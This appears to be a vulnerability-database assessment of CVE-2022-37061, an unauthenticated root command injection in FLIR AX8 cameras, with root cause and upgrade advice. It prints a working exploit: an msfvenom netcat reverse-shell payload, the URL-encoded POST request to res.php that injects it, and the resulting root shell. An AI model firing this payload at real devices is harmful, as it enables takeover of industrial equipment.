CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
100.0%
All FLIR AX8 thermal sensor cameras version up to and including 1.46.16 are vulnerable to Remote Command Injection. This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter in the res.php endpoint. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the root privileges.
Recent assessments:
h00die-gr3y at October 20, 2022 7:41pm UTC reported:
FLIR AX8 is a thermal sensor with imaging capabilities, combining thermal and visual cameras that provides continuous temperature monitoring and alarming for critical electrical and mechanical equipment.
This device is typically used for monitoring industrial environments in a LAN based configuration. Occasionally you can find a FLIR AX8 device where the HTTP web interface is exposed to the public internet.
FLIR AX8 is affected by an unauthenticated remote command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user through the id
HTTP POST parameter in res.php
endpoint. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the root privileges. This issue affects all FLIR AX8 thermal sensor cameras version up to and including 1.46.16
.
The endpoint /res.php
can be called remotely without user authentication as there is no cookie verification Cookie: PHPSESSID=ID
to check if the request is legitimate. The second problem is that the POST parameter id
can be injected to execute any unix command as demonstrated in the example below.
Create a netcat reverse shell payload with msfvenom
# msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.100.7 LPORT=4444 -f raw
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 100 bytes
mkfifo /tmp/ibcnr; nc 192.168.100.7 4444 0</tmp/ibcnr | /bin/sh >/tmp/ibcnr 2>&1; rm /tmp/ibcnr
Use this payload in a burp POST request using the vulnerable id
parameter to launch a netcat shell.
Note: Do not forget to apply the URL encoding.
POST /res.php HTTP/1.1
Host: 192.168.100.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 174
action=alarm&id=2;mkfifo%20%2ftmp%2fibcnr%3b%20nc%20192.168.100.7%204444%200%3c%2ftmp%2fibcnr%20%7c%20%2fbin%2fsh%20%3e%2ftmp%2fibcnr%202%3e%261%3b%20rm%20%2ftmp%2fibcnr
Click send and you will receive a netcat
shell on the attacker host.
# nc -lnvp 4444
listening on [any] 4444 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 51556
whoami
root
uname -a
Linux neco 3.0.35-flir #1 PREEMPT Thu Oct 20 08:20:20 CET 2022 armv7l GNU/Linux
The root cause of this command injection vulnerability is the lack of sanitization checks on the variable $_POST["id"]
, line 65 in the file /FLIR/usr/www/res.php
and malicious actors can therefore take advantage of the shell_exec()
function to execute unexpected arbitrary shell commands.
Besides this vulnerability, three other vulnerabilities were identified. Check the respective CVE’s for more info.
[CVE-2022-37060] – Unauthenticated Directory Traversal
[CVE-2022-37062] – Improper Access Control
[CVE-2022-37063] – Reflected cross-site scripting
As stated in the beginning of this analysis, it very unlikely to find this type of devices exposed to the Internet, but you will find them quite often in industrial environments deployed in a LAN based configuration.
I have created Metasploit module exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061
that will check if the device is vulnerable and launches a reverse netcat
shell or meterpreter
session on a vulnerable device . You can download this module from the link in the reference section below and follow the instructions to run it locally.
Pushing this module to the Metasploit mainstream is in progress.
Upgrade camera version to a higher firmware version then 1.46.16
.
Packetstorm
Metasploit Development h00die-gr3y
Credits goes to the security researchers below who discovered these vulnerabilities.
Assessed Attacker Value: 5
Assessed Attacker Value: 5Assessed Attacker Value: 5
packetstormsecurity.com/files/168114/FLIX-AX8-1.46.16-Remote-Command-Execution.html
packetstormsecurity.com/files/168116/FLIR-AX8-1.46.16-Traversal-Access-Control-Command-Injection-XSS.html
packetstormsecurity.com/files/169701/FLIR-AX8-1.46.16-Remote-Command-Injection.html
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37061
gist.github.com/Nwqda/9e16852ab7827dc62b8e44d6180a6899
www.flir.com/products/ax8-automation/
www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5491.php
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
100.0%